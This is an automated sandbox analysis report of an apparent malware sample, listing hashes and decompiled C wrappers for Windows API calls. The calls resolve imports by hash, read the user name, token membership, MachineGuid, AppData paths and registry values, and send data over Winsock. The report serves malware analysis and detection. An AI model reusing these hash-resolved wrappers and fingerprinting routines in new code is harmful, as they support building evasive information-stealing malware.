GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Uniqueness

Uniqueness Score: -1.00%

Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}

0x00406340
0x00406345
0x00406373
0x00406373
0x00406347
0x0040634f
0x00406354
0x00406357
0x0040635c
0x00406366
0x0040636d
0x00000000
0x00406368
0x00406368
0x00406368
0x00406366
0x0040637a

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser_wmemset
String ID: CA
API String ID: 2078537776-1052703068
Opcode ID: 9189da0bf496198e5532ba4e423fb797779d11f8971b642a3115397bd66d8ecc
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: 9189da0bf496198e5532ba4e423fb797779d11f8971b642a3115397bd66d8ecc
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Uniqueness

Uniqueness Score: -1.00%

Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}

0x00406094
0x004060a8
0x004060ab

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}

0x00402c10
0x00402c15
0x00402c1b
0x00402c1e

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Uniqueness

Uniqueness Score: -1.00%

Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}

0x00404a56
0x00404a65
0x00404a6a
0x00404ad1
0x00404ad1
0x00404a6c
0x00404a71
0x00404a79
0x00404a85
0x00404a9a
0x00404a9e
0x00404acb
0x00000000
0x00404aa0
0x00404aac
0x00404abc
0x00404ac1
0x00404ac6
0x00404ac6
0x00404a9e
0x00404ad9

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: eec20256627107af677a628582154336ea5b2a0a82c9b14be1491fc40266b5d7
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: eec20256627107af677a628582154336ea5b2a0a82c9b14be1491fc40266b5d7
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Uniqueness

Uniqueness Score: -1.00%

Function 00220DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00220223,?,?), ref: 00220E02
SetErrorMode.KERNELBASE(00000000,?,?,00220223,?,?), ref: 00220E07

Memory Dump Source

Source File: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: ddac53debe0c429e99d3ecec711187ada2feab7ef0d0e6c3611846ad14149168
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 37D0123114512C77D7002ED4DC09BCDBB1C9F05B66F008011FB0DD9181C7709D5046E5

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}

0x004060c6
0x004060d5
0x004060d8
0x004060f4
0x004060f6
0x004060fb
0x0040610a
0x00406115
0x0040611c
0x0040611e
0x00406121
0x00000000
0x0040612a
0x0040612f

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Uniqueness

Uniqueness Score: -1.00%

Function 05259B06, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Module32First.KERNEL32(00000000,00000224), ref: 05259B4E

Memory Dump Source

Source File: 00000004.00000002.2375149204.0000000005259000.00000040.00000001.sdmp, Offset: 05259000, based on PE: false

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: e8a69a6c0b488dac63555d98ac70d7bb89e749c50f2e80a5e898f61fb7f9ab32
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 96F06231210715EBE7207BF5988DF6EB6E9FF49675F100529EA4B910C0DA70E885CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00404056, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00404056(void* __ebx, intOrPtr _a4) {
				intOrPtr* _t5;
				void* _t6;
				void* _t14;

				_t14 = E00402B7C(0x208);
				if(_t14 == 0) {
					L4:
					return 0;
				}
				E00402B4E(_t14, 0, 0x208);
				_t5 = E004031E5(__ebx, 0xa, 0xc7f71852, 0, 0);
				_t6 =  *_t5(0, _a4, 0, 0, _t14); // executed
				if(_t6 != 0) {
					E00402BAB(_t14);
					goto L4;
				}
				return _t14;
			}

0x00404066
0x0040406b
0x004040a0
0x00000000
0x004040a0
0x00404072
0x00404083
0x0040408f
0x00404093
0x0040409a
0x00000000
0x0040409f
0x00000000

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,0000000A,C7F71852,00000000,00000000,00413CAD,0000001A,00000001), ref: 0040408F

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$AllocateFolderPathProcess
String ID:
API String ID: 398210565-0
Opcode ID: 411cc4d592f8557d73148f9e0c7471d65f0d11a964c2642beff0645e7398628a
Instruction ID: 7d0b33caadbb1370849e9dfd1ecad86b360ac2e9a1dca59c17201c727c4e1007
Opcode Fuzzy Hash: 411cc4d592f8557d73148f9e0c7471d65f0d11a964c2642beff0645e7398628a
Instruction Fuzzy Hash: 57E06D6260156136D23129A7AC09D6B6E7DCBD3FA5B00003FF708F52C1D96D990281BA

Uniqueness

Uniqueness Score: -1.00%

Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}

0x0040643c
0x00406445
0x00406454

APIs

GetNativeSystemInfo.KERNEL32(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Uniqueness

Uniqueness Score: -1.00%

Function 004044A7, Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044A7(WCHAR* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				long _t9;
				void* _t10;

				E004031E5(_t10, 0, 0xf66be5a2, 0, 0);
				_t9 = GetPrivateProfileStringW(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t9;
			}

0x004044b4
0x004044cb
0x004044ce

APIs

GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
Instruction ID: e6a1e737d40be81796f932fb1ea6dd5b05bd2579ff383e5fb5a00b3a8c54de51
Opcode Fuzzy Hash: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
Instruction Fuzzy Hash: 52D0C27604410DBFDF025EE1DC05CAB3F6EEB48354B408425BE2895021D637DA71ABA5

Uniqueness

Uniqueness Score: -1.00%

Function 004049B3, Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004049B3(void* _a4, WCHAR* _a8, WCHAR* _a12, DWORD* _a16, void* _a20, DWORD* _a24) {
				int _t8;
				void* _t9;

				E004031E5(_t9, 2, 0xdc1011d7, 0, 0);
				_t8 = SHGetValueW(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t8;
			}

0x004049c1
0x004049d8
0x004049db

APIs

SHGetValueW.SHLWAPI(?,?,?,?,?,?,00000002,DC1011D7,00000000,00000000), ref: 004049D8

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
Instruction ID: 49132b90e07f175002bb52db16c83daeb6fc20f74050e769a3614ef6a11dfcc0
Opcode Fuzzy Hash: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
Instruction Fuzzy Hash: 71D0923214020DBBDF026ED1DC02FAA3F2AAB09758F104014FB18280A1C677D631AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}

0x00404eed
0x00404ef2
0x00404efd
0x00404efd
0x00404f07
0x00404f0e

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Uniqueness

Uniqueness Score: -1.00%

Function 004049DC, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004049DC(void* _a4, int _a8, WCHAR* _a12, DWORD* _a16) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 2, 0xeca4834b, 0, 0);
				_t6 = SHEnumKeyExW(_a4, _a8, _a12, _a16); // executed
				return _t6;
			}

0x004049ea
0x004049fb
0x004049fe

APIs

SHEnumKeyExW.SHLWAPI(?,?,?,?,00000002,ECA4834B,00000000,00000000), ref: 004049FB

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
Instruction ID: fb20b8ae34c3d99b6a2ec1f59af3280c7c0bbdac25ffdbb9458fe1f208d0831b
Opcode Fuzzy Hash: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
Instruction Fuzzy Hash: 45D0023114430D7BEF115ED1DC06F597F1ABB49B54F104455BB18680E19673A6305755

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Uniqueness

Uniqueness Score: -1.00%

Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}

0x00404a27
0x00404a35
0x00404a38

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Uniqueness

Uniqueness Score: -1.00%

Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}

0x00402c2c
0x00402c34
0x00402c37

APIs

LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Uniqueness

Uniqueness Score: -1.00%

Function 00408B2C, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408B2C(struct HINSTANCE__* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe0cf5891, 0, 0);
				_t4 = FreeLibrary(_a4); // executed
				return _t4;
			}

0x00408b39
0x00408b41
0x00408b44

APIs

FreeLibrary.KERNELBASE(?,00000000,E0CF5891,00000000,00000000), ref: 00408B41

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
Instruction ID: 291ca984118c00001a410e8fe814b9ebecee15bf7cc635df9db1cfcd8d33b31d
Opcode Fuzzy Hash: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
Instruction Fuzzy Hash: 0EB092B004820C3EAE002EF19C05C3B3E8DEA4454870044757E0CE5051EA36DE1110A5

Uniqueness

Uniqueness Score: -1.00%

Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}

0x00404a0d
0x00404a15
0x00404a18

APIs

RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Uniqueness

Uniqueness Score: -1.00%

Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}

0x00403b72
0x00403b7a
0x00403b7d

APIs

PathFileExistsW.SHLWAPI(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Uniqueness

Uniqueness Score: -1.00%

